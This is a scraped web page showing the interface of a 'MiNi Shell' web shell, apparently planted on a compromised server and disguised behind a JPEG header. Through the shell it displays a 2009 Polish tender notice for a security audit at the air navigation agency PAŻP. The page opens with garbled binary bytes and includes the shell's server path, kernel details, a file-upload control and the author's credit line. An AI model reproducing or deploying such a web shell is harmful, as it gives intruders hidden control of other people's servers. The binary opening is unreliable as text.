JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090817/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090817/280466-N-2009.html

<p class="kh_header"><b>Warszawa: PRZEPROWADZENIE AUDYTU BEZPIECZEŃSTWA SYSTEMÓW INFORMATYCZNYCH ORAZ ZAPROJEKTOWANIE I IMPLEMENTACJA SYSTEMU ZARZĄDZANIA BEZPIECZEŃSTWEM INFORMACJI W  PAŻP.</b><br>
<b>Numer ogłoszenia: 280466 - 2009; data zamieszczenia: 17.08.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Polska Agencja Żeglugi Powietrznej , ul. Wieżowa 8, 02-147 Warszawa, woj. mazowieckie, tel. 022 5745000, faks 022 5746359.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pansa.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Państwowa Osoba Prawna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> PRZEPROWADZENIE AUDYTU BEZPIECZEŃSTWA SYSTEMÓW INFORMATYCZNYCH ORAZ ZAPROJEKTOWANIE I IMPLEMENTACJA SYSTEMU ZARZĄDZANIA BEZPIECZEŃSTWEM INFORMACJI W  PAŻP..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest przeprowadzenie przez Wykonawcę na rzecz Zamawiającego audytu bezpieczeństwa systemów i sieci informatycznych, infrastruktury teleinformatycznej oraz zaprojektowanie i implementacja Systemu Zarządzania Bezpieczeństwem Informacji (SZBI) w systemach i sieciach PAŻP..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 79.21.20.00-3.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 100.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 1.	Zamawiający wymaga  wniesienia wadium.
2.	Przystępując do niniejszego postępowania każdy Wykonawca zobowiązany jest wnieść wadium w wysokości  15 000,00 PLN (słownie: piętnaście tysięcy  00 100 złotych).
3.	Wadium należy wnieść w formach przewidzianych w art. 45 ust. 6 ustawy, tj. w:
1)	pieniądzu,
2)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
3)	gwarancjach bankowych (bezwarunkowych, nieodwołalnych, płatnych na pierwsze żądanie),
4)	gwarancjach ubezpieczeniowych (bezwarunkowych, nieodwołalnych, płatnych na pierwsze żądanie),
5)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6 b ust. 5 pkt 2 ustawy z dna 9 listopada 2000r., o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007 r. Nr 42, poz. 275).
4.	Wykonawca zobowiązany jest wnieść wadium przed upływem terminu składania ofert.
5.	W przypadku wadium wnoszonego w pieniądzu za termin wniesienia uznaje się chwilę uznania kwoty na rachunku Zamawiającego.
6.	Wadium w pieniądzu należy wnieść na konto Zamawiającego - Bank PeKaO S.A. O Warszawa ul. Grzybowska 53 57 - konto nr 56 1240 6003 1111 0000  4940 6320, tytułem wadium - postępowanie nr AZP-224-80-2009, do terminu składania ofert,
7.	W przypadku wniesienia wadium w formie innej niż pieniądz - oryginał dokumentu potwierdzającego wniesienie wadium należy złożyć przed upływem terminu składania ofert w budynku Zamawiającego, ul. Gałczyńskiego 2a, 05-090 Raszyn, w kancelarii - pokój 004 lub zamieścić w osobnej kopercie - opisanej wadium - postępowanie nr AZP-224-80-2009 dołączonej do oferty. W przypadku wnoszenia wadium w pozostałych dopuszczalnych formach określonych w pkt 3,beneficjentem takich dokumentów musi być Polska Agencja Żeglugi Powietrznej ul. Wieżowa 8,02-147 Warszawa , złożone poręczenie lub gwarancja muszą zawierać w swojej treści zobowiązanie zgodne z art. 46 ust. 4a oraz ust. 5 ustawy.
8.	Nie wniesienie wadium w terminie lub w sposób określony w SIWZ spowoduje wykluczenie Wykonawcy na podstawie art. 24 ust. 2 pkt 4 ustawy, a jego oferta zostanie odrzucona na podstawie art. 24 ust. 4 ustawy.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1.	Warunek nr 1 - Wykonawca posiada uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień, a w szczególności:
a)	przedstawi aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej;
b)	przedstawi oświadczenie o spełnianiu warunków udziału w postępowaniu w zakresie określonym w art. 22 ust. 1 pkt 1 ustawy;
2. Warunek nr 2 - Wykonawca posiada niezbędną wiedzę i doświadczenie oraz dysponuje potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawi pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia, a w szczególności: 
 
a) w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał lub wykonuje należycie, co najmniej 3 usługi odpowiadającą swoim rodzajem i wartością usłudze stanowiącej przedmiot zamówienia. Przez usługi odpowiadające swoim rodzajem i wartością usłudze stanowiącej przedmiot zamówienia Zamawiający rozumie zamówienia polegające na przeprowadzeniu  audytów zgodnie z normą BS 7799, PN ISO IEC 17799 lub PN ISO IEC 27001, w tym jeden wykonany dla co najmniej  800 stanowisk   oraz  przynajmniej 1 projekt zakończył się certyfikacją wg normy PN ISO IEC 27001.
b) przedstawi dokumenty potwierdzające należyte wykonanie usług określonych w ppkt. a);
c) dysponuje lub będzie dysponował osobami zdolnymi do wykonania zamówienia, które uczestniczyć będą w realizacji zamówienia, tj.: 

Kierownik projektu:
1.	Wykształcenie wyższe techniczne.
2.	Certyfikat IT Security Manager.
3.	Funkcja Audytora Wewnętrznego SZJ. 
4.	Certyfikat audytora wiodącego systemu zarządzania bezpieczeństwem informacji wg ISO IEC  27001  (ISO IEC 17799).
5.	Poświadczenie bezpieczeństwa upoważniające do dostępu do informacji niejawnych stanowiących tajemnicę służbową o klauzuli poufne.
6.	Potwierdzone doświadczenie w zakresie znajomości norm ISO.
7.	Uczestnictwo w przynajmniej 6 projektach, jako kierownik merytoryczny przy realizacji audytów bezpieczeństwa lub prac konsultacyjnych w zakresie bezpieczeństwa systemów teleinformatycznych,   w tym przynajmniej 2 projekty na kwoty nie mniejsze jak 200 tys. zł. 

W skład zespołu Wykonawcy powinna wchodzić grupa  od 4 do 6 osób spełniających wspólnie wszystkie następujące wymagania:
 
1.	Posiadać wykształcenie wyższe, w tym co najmniej jedna osoba o specjalizacji automatyka i  jedna o specjalizacji IT.
2.	Uczestniczyć w przynajmniej 6 projektach jako konsultant-ekspert przy realizacji audytów bezpieczeństwa lub prac konsultacyjnych w zakresie bezpieczeństwa systemów teleinformatycznych dla firm zatrudniających przynajmniej 200 osób.
3.	Certyfikat audytora wiodącego systemu zarządzani bezpieczeństwem informacji wg ISO IEC 27 001 (ISO IEC 17799).
4.	Certyfikat CISM.
5.	Certyfikat TOGAF.
6.	Certyfikat Prince 2 Foundation.
7.	Udokumentowane doświadczenie z obszaru rozwiązań informatycznych związanych z techniką wspomagającą ruch  lotniczy . Wykształcenie kierunkowe z zakresu techniki tego obszaru.
8.	Udokumentowane doświadczenie w oprogramowaniu systemów bezpieczeństwa, w tym   
   systemów automatyki -  wykształcenie automatyk.
9.	Udokumentowane doświadczenie w zakresie systemów monitoringu.
10.	Znajomość ITIL.
11.	Udokumentowane doświadczenie w przygotowaniu planów ciągłości działania
12.	Poświadczenie bezpieczeństwa upoważniające do dostępu do informacji niejawnych stanowiących tajemnicę służbową o klauzuli co najmniej poufne (każdy).



d) przedstawi dokumenty potwierdzające uprawnienia osób, które uczestniczyć będą w realizacji zamówienia:
kopie dyplomów potwierdzające ukończenie studiów wyższych.  
kopie poświadczeń bezpieczeństwa.
kopie dokumentów potwierdzających ukończenie szkoleń.
kopie wymaganych, imiennych certyfikatów lub imiennych certyfikatów równoważnych.
oświadczenia Wykonawcy, potwierdzające udział wskazanych osób (wymienionych w wykazie) w projektach o podobnych profilach.
e) przedstawi pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, w przypadku gdy Wykonawca będzie nimi dysponował;
f) przedstawi oświadczenie o spełnieniu warunków udziału w postępowaniu w zakresie określonym w art. 22 ust. 1 pkt 2 ustawy;
 3. Warunek nr 3 - Wykonawca znajduje się w sytuacji ekonomicznej i finansowej zapewniającej  wykonanie zamówienia, a w szczególności:
a) przedstawi polisę, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności na kwotę nie niższą niż 1 000 000,00 zł (słownie: jeden milion złotych); 
W przypadku podania kwoty polisy w walucie innej niż PLN, w celu oceny spełniania ww. warunku Zamawiający dokona przeliczenia wskazanej kwoty na PLN według średniego kursu Narodowego Banku Polskiego obowiązującego w dniu publikacji ogłoszenia o niniejszym zamówieniu w Biuletynie Zamówień Publicznych.
b) przedstawi oświadczenie o spełnieniu warunków udziału w postępowaniu w zakresie określonym w art. 22 ust. 1 pkt. 3 ustawy;
4. Warunek nr 4 - Wykonawca nie podlega wykluczeniu z postępowania o udzielenie zamówienia, a w szczególności:
a) przedstawi oświadczenie o spełnianiu warunków udziału w postępowaniu w zakresie określonym w art. 22 ust. 1 pkt. 4 ustawy;
5.	Wykonawcy wspólnie ubiegający się o zamówienie.
W celu potwierdzenia spełniania warunków udziału w postępowaniu przez Wykonawców składających wspólną ofertę:
a) spełnianie warunków nr 1 - 3 oceniane będzie łącznie;
b) spełnianie warunków nr 4 oceniane będzie dla każdego Wykonawcy z osobna.
6.	Zamawiający oceni spełnianie warunków udziału w postępowaniu na podstawie informacji zawartych w oświadczeniach i dokumentach załączonych do oferty. 
7.	Ocena spełniania warunków wymaganych od Wykonawców nastąpi wg formuły: spełnia - nie spełnia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Na potwierdzenie spełniania warunków udziału w postępowaniu Wykonawcy obowiązani są złożyć niżej wymienione dokumenty:
I.	Aktualny odpis z właściwego rejestru albo zaświadczenie o wpisie do ewidencji działalności gospodarczej - wystawiony z datą nie wcześniej niż na 6 miesięcy przed upływem terminu składania ofert;                                             
	W przypadku wykonawców wspólnie ubiegających się o zamówienie, dokumenty składa każdy z wykonawców.
II.	Wykaz wykonanych usług w okresie trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością usłudze stanowiącym przedmiot zamówienia - z podaniem ich wartości, przedmiotu usługi, dat i miejsca wykonania, odbiorców (nazwa, adres i telefon) - 1 egzemplarz, datowany i odpowiednio podpisany - opracowany wg druku dołączonego do  specyfikacji - załącznik nr 6; 
III.  Dokumenty potwierdzające należyte wykonanie usług uwzględnionych w wykazie, o którym mowa w pkt II - referencje, opinie itp.; 
IV. 	Wykaz osób, które uczestniczyć będą w wykonaniu zamówienia - wraz z informacjami na temat ich  kwalifikacji i uprawnień niezbędnych do wykonania zamówienia, datowany i odpowiednio podpisany - opracowany wg druku dołączonego do specyfikacji - załącznik nr 7;
V.	Dokumenty potwierdzające, że osoby, które będą uczestniczyć w wykonaniu zamówienia, posiadają wymagane kwalifikacje i uprawnienia.
VI. Polisa, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności - dokument aktualny na dzień składania ofert; 
VII. Oświadczenie o spełnianiu warunków udziału w postępowaniu w zakresie art. 22 ust. 1 pkt 1 - 3 ustawy - druk - opracowany wg druku dołączonego do specyfikacji - załącznik nr 4
VIII. Oświadczenie o spełnianiu warunków udziału w postępowaniu w zakresie art. 22 ust. 1 pkt 4   ustawy - druk - opracowany wg druku dołączonego do specyfikacji - załącznik nr 5
IX. Pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia - jeżeli w Wykazie o którym mowa w pkt IV Wykonawca wskazał osoby, którymi będzie dysponował.


UWAGI!
1.	W przypadku, gdy Wykonawcę reprezentuje pełnomocnik, do oferty należy dołączyć pełnomocnictwo podpisane przez osoby uprawnione do reprezentowania Wykonawcy. Treść pełnomocnictwa musi jednoznacznie wskazywać czynności, do wykonywania których pełnomocnik jest upoważniony (zakres umocowania). Pełnomocnictwo należy złożyć w oryginale lub kopii poświadczonej notarialnie za zgodność z oryginałem. 
2.	W przypadku Wykonawców składających wspólną ofertę, do oferty należy dołączyć pełnomocnictwo do reprezentowania wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia (wystawione zgodnie z art. 23 ust. 2 ustawy). Treść pełnomocnictwa musi jednoznacznie wskazywać czynności, do wykonywania których pełnomocnik jest upoważniony (zakres umocowania). Pełnomocnictwo należy złożyć w oryginale lub kopii poświadczonej notarialnie za zgodność z oryginałem.
3.	Oferta oraz wszystkie złożone z nią dokumenty i oświadczenia muszą być podpisane przez pełnomocnika osobę umocowaną do reprezentowania Wykonawcy-Wykonawców. Wszystkie kserokopie dokumentów załączone do oferty muszą zawierać oświadczenie za zgodność z oryginałem.
4.	 Z postępowania o udzielenie zamówienia wyklucza się wykonawców, którzy złożyli nieprawdziwe informacje mające wpływ na wynik prowadzonego postępowania..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.pansa.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Polska Agencja Żeglugi Powietrznej, 05-090 Raszyn, ul. Gałczyńskiego 2a, Dział Zamówień Publicznych, pok. 303..</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.08.2009 godzina 09:30, miejsce: Polska Agencja Żeglugi Powietrznej, 05-090 Raszyn, ul. Gałczyńskiego 2a 
pok. 004 - Kancelaria.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamawiający przewiduje możliwość dokonania zmiany postanowień przyszłej umowy w stosunku do treści oferty zgodnie z poniższymi warunkami:
a) konieczność wprowadzenia takich zmian wynika z okoliczności, których nie można było przewidzieć w chwili zawarcia umowy, a w szczególności gdy:
nastąpi zmiana powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu zamówienia; 
wynikną rozbieżności lub niejasności w rozumieniu pojęć użytych w umowie, których nie można usunąć w inny sposób a zmiana będzie umożliwiać usunięcie rozbieżności i doprecyzowanie umowy w celu jednoznacznej interpretacji jej zapisów przez strony;
zaistnieją zdarzenia o charakterze siły wyższej, niezależne od stron umowy, które uniemożliwiłyby terminowe wykonanie zobowiązań. Strony zobowiązują się do ustalenia odpowiednio zmienionego terminu wykonania przedmiotu umowy. Za siłę wyższą uważa się zdarzenia zewnętrzne, których skutków nie da się przewidzieć ani im zapobiec. W szczególności za siłę wyższą będzie się uważać działania sił przyrody takie jak: huragan, trzęsienie ziemi, powódź oraz inne zdarzenia takie jak: wojnę, zamieszki, skażenie radioaktywne etc.;
konieczność wprowadzenia zmian będzie dotyczyć treści w dokumencie o charakterze informacyjno - instrukcyjnym, niezbędnym dla sprawnej realizacji umowy w szczególności: zmian osób uprawnionych do kontaktów, zmian osób odpowiedzialnych za potwierdzenie prawidłowej realizacji zamówienia wraz z numerami telefonów, faksu, poczty elektronicznej, etc.
konieczność wprowadzenia zmian będzie dotyczyć osób zdolnych do wykonania zamówienia wskazanych przez Wykonawcę w ofercie, z zastrzeżenie, iż osoby te będą posiadały uprawnienia wymagane w Specyfikacji Istotnych Warunków Zamówienia.
konieczność  zmiany terminu realizacji wykonania przedmiotu umowy w następujących przypadkach:

Creat By MiNi SheLL
Email: jattceo@gmail.com